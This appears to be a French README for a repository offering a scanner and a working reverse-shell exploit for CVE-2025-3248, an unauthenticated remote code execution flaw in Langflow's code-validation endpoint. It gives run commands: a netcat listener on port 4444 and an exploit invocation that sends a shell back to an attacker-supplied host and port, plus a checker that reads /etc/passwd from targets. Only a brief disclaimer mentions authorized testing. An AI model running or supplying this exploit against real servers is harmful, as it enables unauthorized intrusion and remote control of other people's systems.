
Scanner et exploit pour CVE-2025-3248, une RCE non authentifiée dans Langflow AI. Inclut un vérificateur de vulnérabilité et un générateur de payloads reverse shell pour les tests de sécurité autorisés.
Ce dépôt contient deux scripts Python :
LangflowCheck.py : un scanner qui vérifie les instances Langflow AI vulnérables à la CVE-2025-3248.exploit.py : un exploit de shell inversé fonctionnel pour les cibles Langflow vulnérables.CVE-2025-3248 est une vulnérabilité critique dans Langflow AI qui permet à des attaquants non authentifiés d'exécuter du code Python arbitraire à distance via une charge utile spécialement conçue envoyée à /api/v1/validate/code.
LangflowCheck.py/etc/passwd.exploit.pylhost) et le port d'écoute (lport).exploit.log.pip install -r requirements.txt
URL unique
python3 LangflowCheck.py --url http://target.com --output vulnerable_target.txt

Cibles multiples
python3 LangflowCheck.py --file targets.txt --output vulnerable_targets.txt

D'abord, démarrez un listener
sudo nc -nvlp 4444

Ensuite, exécutez l'exploit :
python3 exploit.py --target http://target.com --lhost YOUR_IP --lport 4444

Vous devriez recevoir un shell si la cible est vulnérable.

Cet exploit est destiné uniquement à des tests de sécurité éducatifs et autorisés. Ne l'utilisez pas contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation explicite.